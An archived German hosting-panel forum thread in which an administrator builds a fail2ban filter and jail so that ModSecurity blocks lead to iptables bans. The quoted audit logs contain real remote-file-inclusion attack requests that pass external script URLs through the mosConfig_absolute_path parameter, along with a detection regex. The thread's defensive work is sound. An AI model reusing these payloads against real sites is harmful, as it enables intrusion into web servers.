+- ispCP - Board - Support (http://www.isp-control.net/forum)
+-- Forum: ispCP Omega International Area (/forum-22.html)
+--- Forum: German Corner (/forum-26.html)
+---- Forum: Archiv (/forum-54.html)
+---- Thread: [Erledigt] iptables apache anbindung (/thread-2518.html)
[Erledigt] iptables apache anbindung - fulltilt - 02-21-2008 08:54 PM
Kennt jemand eine Möglichkeit um mod_security an iptables anzubinden?
Also wenn z.b. eine regex aus einer der confs passt das dann direkt geblockt wird. Modsecurity schickt zwar die Fehlerseite aber wenn jemand Rootkits installieren will, kostet das ganze sehr viel Leistung.
RE: iptables apache anbindung - BeNe - 02-21-2008 09:01 PM
Quote:Also wenn z.b. eine regex aus einer der confs passt das dann direkt geblockt wirdWäre eigentlich das Thema von FAIL2BAN. Das hast Du ja auch schon im Einsatz.
Greez BeNe
RE: iptables apache anbindung - fulltilt - 02-21-2008 09:15 PM
Hi BeNe,
müsste auch über fail2ban klappen ... aber kann man die regex nicht so umschreiben das statt 403 - iptables blockt?
Also solche Logs direkt blockieren ohne erst ne Fehlermeldung:
Code:
GET /?mosConfig_absolute_path=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxxxxx.tld
User-Agent: libwww-perl/5.808
--ba07427a-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
Producer: ModSecurity v2.1.1 (Apache 2.x)RE: iptables apache anbindung - fulltilt - 02-21-2008 09:49 PM
Ich hab es mal so probiert:
In filter.d angelegt: apache-modsec.conf
Code:
[Definition]
# Option: failregex
# Notes.: regex to match the password failure messages in the logfile. The
# host must be matched by a group named "host". The tag "<HOST>" can
# be used for standard IP/hostname matching.
# Values: TEX
#
failregex = [[]client <HOST>[]] Message: Access denied with code 403
# Option: ignoreregex
# Notes.: regex to ignore. If this regex matches, the line is ignored.
# Values: TEXT
#
ignoreregex =in jail.conf:
Code:
[apache-modsec]
enabled = true
port = http
filter = apache-modsec
logpath = /var/log/apache*/mod-security2.log
maxretry = 1Ich nutze modsecurity2 welches nach /var/log/apache*/mod-security2.log loggt.
Ist das oben soweit richtig zu diesem Log bzw. funktioniert das so?
Die IP des Angreifers steht in der ersten Zeile und dahinter gleich die meines Servers.
Die Logeinträge sehen so aus:
Code:
--e97c4236-A--
[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80
--e97c4236-B--
GET /content/view/20/38//?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.tld.tld
User-Agent: libwww-perl/5.808
--e97c4236-F--
HTTP/1.1 403 Forbidden
Last-Modified:
ETag: "119xxxxxxxxxxx56540"
Accept-Ranges: bytes
Content-Length: 1136
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1
--e97c4236-H--
Message: Access denied with code 403 (phase 2). Pattern match "(\\.\\./\\.\\.|/|(http|https|ftp)\\:/)" at ARGS:mosConfig_absolute_path. [id "390075"] [rev "1"] [msg "JITP: Generic mosConfig_absolute_path File Inclusion Vulnerability"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
--e97c4236-Z--RE: iptables apache anbindung - BeNe - 02-21-2008 10:13 PM
Ja, das könnte so funktionieren. Lass es einfach mal so laufen und schaue in dann in die Log von Fail2ban. Sonst müssen wir das regex anpassen.
Greez BeNe
RE: iptables apache anbindung - fulltilt - 02-21-2008 10:25 PM
Danke BeNe,
poste ich hier später ...
Sonst habe ich relativ viele solcher Angriffe ... momentan ist alles ruhig :-)
BeNe Wrote:Ja, das könnte so funktionieren. Lass es einfach mal so laufen und schaue in dann in die Log von Fail2ban. Sonst müssen wir das regex anpassen.
Greez BeNe
RE: iptables apache anbindung - fulltilt - 02-22-2008 06:45 PM
Hm - klappt leider noch nicht so ...
Ich denke es ist wg. der Logeinträge von modseurity2.
Die IP des Angreifers müsste wohl direkt vorne stehen mit dem Teil der regex.
Kann das Logformat so angepasst werden?
Code:
# Logfile
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus "^[45]"
SecAuditLogType Serial
SecAuditLog /var/log/apache2/mod-security2.log
SecAuditLogParts "ABIFHZ"RE: iptables apache anbindung - BeNe - 02-22-2008 10:43 PM
Ich habe leider auf keinem Server Mod_Security laufen daher kann ich Dir hier nicht mehr groß weiterhelfen
Aber vielleicht findet sich ja was in anderen Foren zu dem Thema.
Greez BeNe
RE: iptables apache anbindung - fulltilt - 02-22-2008 10:49 PM
Danke BeNe,
ich teste mal alles durch mit den Log Formats ...
BeNe Wrote:Ich habe leider auf keinem Server Mod_Security laufen daher kann ich Dir hier nicht mehr groß weiterhelfen
Aber vielleicht findet sich ja was in anderen Foren zu dem Thema.
Greez BeNe
RE: iptables apache anbindung - Rene - 02-24-2008 12:32 AM
Hallo,
Quote:Die IP des Angreifers müsste wohl direkt vorne stehen mit dem Teil der regex
Quote:Code:
failregex = [[]client <HOST>[]] Message: Access denied with code 403
also wenn du das so formulierst, dann ja
du solltest es schon anpassen und nicht einfach aus anderen Regeln kopieren ohne zu wissen was es bedeutet.
wenn im log ein Zweizeiler ist, hast du pech. die IP muss in der selben Zeile stehen wie die Fehlermeldung.
Edit:
Die Zeile musst du nutzen:
Quote:Code:
[21/Feb/2008:10:30:30 +0100] wbi3aMMYTXsAAGuGDoQAAAAX xx.117.225.155 33139 xxx.xx.xx.xxx 80